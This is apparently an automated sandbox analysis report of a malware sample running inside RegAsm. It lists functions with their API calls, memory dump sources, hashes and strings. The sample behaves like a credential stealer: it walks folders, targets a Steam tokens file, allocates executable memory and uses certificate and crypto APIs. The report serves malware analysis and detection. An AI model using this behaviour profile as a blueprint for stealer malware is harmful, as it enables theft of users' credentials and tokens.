                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-3916222277
                                                        • Opcode ID: a7bb42c3b6aec38a6633a2138440991d8c4bbf44a7ff8b1396c9f23c5946f606
                                                        • Instruction ID: 7984488373151970b2f7cc4cb77aa932a629df4622b49b427924423c0aea3729
                                                        • Opcode Fuzzy Hash: a7bb42c3b6aec38a6633a2138440991d8c4bbf44a7ff8b1396c9f23c5946f606
                                                        • Instruction Fuzzy Hash: CF119DB150050AFADF20CF98EA847AAB7E4FB00340F62453AD543E62C4C77DDA62E759
                                                        Function 0040FDC7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHFileOperationA.SHELL32(?), ref: 0040FDFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: FVA
                                                        • API String ID: 3080627654-1718395828
                                                        • Opcode ID: b7f51786fd65f42c6c3e108953370bb8ad7576157105cc8aee5f32b821e6158c
                                                        • Instruction ID: 6e6b30ab44ce2692c973f8ef192d054c5e45e0e7841dd16d135056f4857d1f49
                                                        • Opcode Fuzzy Hash: b7f51786fd65f42c6c3e108953370bb8ad7576157105cc8aee5f32b821e6158c
                                                        • Instruction Fuzzy Hash: 7EE052B4D0820D9BCB54DFA9E4456DEBBF8FF08304F00816AE809E7340E77496418B99
                                                        Function 00414521 Relevance: 3.1, APIs: 2, Instructions: 111stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104,00000000,?), ref: 0041455A
                                                        • lstrcatA.KERNEL32(?), ref: 00414575
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 00414277
                                                          • Part of subcall function 0041425C: FindFirstFileA.KERNEL32(?,?), ref: 0041428E
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E258), ref: 004142BB
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E254), ref: 004142D5
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 004142F5
                                                          • Part of subcall function 0041425C: StrCmpCA.SHLWAPI(?,0041E266), ref: 00414302
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 0041431F
                                                          • Part of subcall function 0041425C: PathMatchSpecA.SHLWAPI(?,?), ref: 00414342
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?,000003E8), ref: 0041436E
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,0041E264), ref: 0041437C
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?), ref: 0041438C
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,0041E264), ref: 0041439A
                                                          • Part of subcall function 0041425C: lstrcatA.KERNEL32(?,?), ref: 004143AE
                                                          • Part of subcall function 0041425C: wsprintfA.USER32 ref: 0041432F
                                                          • Part of subcall function 0041425C: FindNextFileA.KERNEL32(?,?), ref: 004144FD
                                                          • Part of subcall function 0041425C: FindClose.KERNEL32(?), ref: 0041450E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                        • String ID:
                                                        • API String ID: 153043497-0
                                                        • Opcode ID: 92844478e44a75d61903d71b341270e47d90b310caaf5080e779d2b2da7adac9
                                                        • Instruction ID: 234fd84303f5a65995140a1e19c6d50796f64b4a607ab90c3cbeab33e8e9df84
                                                        • Opcode Fuzzy Hash: 92844478e44a75d61903d71b341270e47d90b310caaf5080e779d2b2da7adac9
                                                        • Instruction Fuzzy Hash: D831C571D0111DBFCF21FBB5CC07CE9376DAB49305F40496AF948A7090EA3986998BA2
                                                        Function 00412A62 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,0041E266,?,?,?,004150CC,?,?), ref: 00412AA1
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        Strings
                                                        • Soft\Steam\steam_tokens.txt, xrefs: 00412AB6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$CreateObjectOpenSingleThreadWaitlstrcat
                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                        • API String ID: 2202680014-3507145866
                                                        • Opcode ID: 2c4e4fd1a12935747a0205cdc4edbb9164c511d7af0ec1c4558d0b5d63a31153
                                                        • Instruction ID: bb679a8e5fcd890ffb60ecc66d5758111cacaf56b40fe39a17a709515bd51e16
                                                        • Opcode Fuzzy Hash: 2c4e4fd1a12935747a0205cdc4edbb9164c511d7af0ec1c4558d0b5d63a31153
                                                        • Instruction Fuzzy Hash: EB010071D00008B6CB04FBF3DC578EE77789E24308F404E7AB812720D2EF3866198699
                                                        Function 0040765C Relevance: 2.7, APIs: 2, Instructions: 196stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • lstrlenA.KERNEL32(00000000), ref: 00407824
                                                        • lstrlenA.KERNEL32(00000000), ref: 00407838
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 3799617333-0
                                                        • Opcode ID: 2545d78b6ec2f9da1e3b1204db52704c0245945cf27e655b6363ae788cff7583
                                                        • Instruction ID: d86d40f677a78180d4890fbcd16b6a4a33eb0c043646df1fe9b5aa60805336a8
                                                        • Opcode Fuzzy Hash: 2545d78b6ec2f9da1e3b1204db52704c0245945cf27e655b6363ae788cff7583
                                                        • Instruction Fuzzy Hash: CE61E072900118ABCF14FBE2DD56CEE7779AF24309B50093AF402B21D2EF396A15CA65
                                                        Function 0040627C Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(?,00421EE4,00003000,00000040,?,00000000,?,?,0040667E,?,00421EE4), ref: 004062DB
                                                        • VirtualAlloc.KERNEL32(00000000,00421EE4,00003000,00000040,?,00000000,?,?,0040667E,?,00421EE4), ref: 00406307
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: b8effb91bd031fc4778145e73d7e6622ce16385c08ecd146706459cd88fa8054
                                                        • Instruction ID: 03ad950a0f44138f8ca2597ba49cfc2352e03ed70d1668e1689f547a1e5ee09a
                                                        • Opcode Fuzzy Hash: b8effb91bd031fc4778145e73d7e6622ce16385c08ecd146706459cd88fa8054
                                                        • Instruction Fuzzy Hash: 4B219071600B059BCB24DFB4C981BABB7F5EB40714F24496EE517E63D0D679A9408A18
                                                        Function 00406632 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6d2d9d7bfe2187840dce9a6979a7c0bf67299e377cbc1b99a0af0ca43e66ed3
                                                        • Instruction ID: 89cab240d42eec06e26bbb0363fd2ccef5e94f44c7418e2bd4de68e205b9d155
                                                        • Opcode Fuzzy Hash: e6d2d9d7bfe2187840dce9a6979a7c0bf67299e377cbc1b99a0af0ca43e66ed3
                                                        • Instruction Fuzzy Hash: 32414C7190021AEFCF14AF94D9809AEBBB1AB04318F12847EE916B7391D7359D61CB58
                                                        Function 0040F84D Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPathlstrcpy
                                                        • String ID:
                                                        • API String ID: 1699248803-0
                                                        • Opcode ID: 717ddf31fe7abef4a61848d01122762fdbdb344df6f76e9e3328f1d7e8f1c047
                                                        • Instruction ID: ad525a25f2ecf0f1d0d84631831ab5d637dd9cd4e0245ab6cff2eccf30052fa8
                                                        • Opcode Fuzzy Hash: 717ddf31fe7abef4a61848d01122762fdbdb344df6f76e9e3328f1d7e8f1c047
                                                        • Instruction Fuzzy Hash: B7E0C97591014CBBDF11DFA4DC949AEB7FDEB48204F0099A5A905E3290E674EB468BA0
                                                        Function 0040F81D Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesA.KERNEL32(00000000,?,?,0040AF3A,?,?,?,?), ref: 0040F82A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 62c1f45554b30a927a372d334f908be19888592cccdae83ba20e93f6a191c7fe
                                                        • Instruction ID: c92f95369f9fbb8d2f28476ad1b86f896e86489c3ccdde02ab6dd7b8d661c98a
                                                        • Opcode Fuzzy Hash: 62c1f45554b30a927a372d334f908be19888592cccdae83ba20e93f6a191c7fe
                                                        • Instruction Fuzzy Hash: 64D0C23200013417C6243AA9DC054EA7308CD017657005636FD0AA20E1D7349E1BC2C9

                                                        Non-executed Functions

                                                        Function 6C0D6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0D6CCC
                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0D6D11
                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C0D6D26
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C0D6D35
                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C0D6D53
                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C0D6D73
                                                        • free.MOZGLUE(00000000), ref: 6C0D6D80
                                                        • CertGetNameStringW.CRYPT32 ref: 6C0D6DC0
                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0D6DDC
                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0D6DEB
                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C0D6DFF
                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C0D6E10
                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C0D6E27
                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C0D6E34
                                                        • CreateFileW.KERNEL32 ref: 6C0D6EF9
                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C0D6F7D
                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C0D6F8C
                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C0D709D
                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C0D7103
                                                        • free.MOZGLUE(00000000), ref: 6C0D7153
                                                        • CloseHandle.KERNEL32(?), ref: 6C0D7176
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D7209
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D723A
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D726B
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D729C
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D72DC
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D730D
                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0D73C2
                                                        • VerSetConditionMask.NTDLL ref: 6C0D73F3
                                                        • VerSetConditionMask.NTDLL ref: 6C0D73FF
                                                        • VerSetConditionMask.NTDLL ref: 6C0D7406
                                                        • VerSetConditionMask.NTDLL ref: 6C0D740D
                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D741A
                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0D755A
                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D7568
                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C0D7585
                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C0D7598
                                                        • free.MOZGLUE(00000000), ref: 6C0D75AC
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
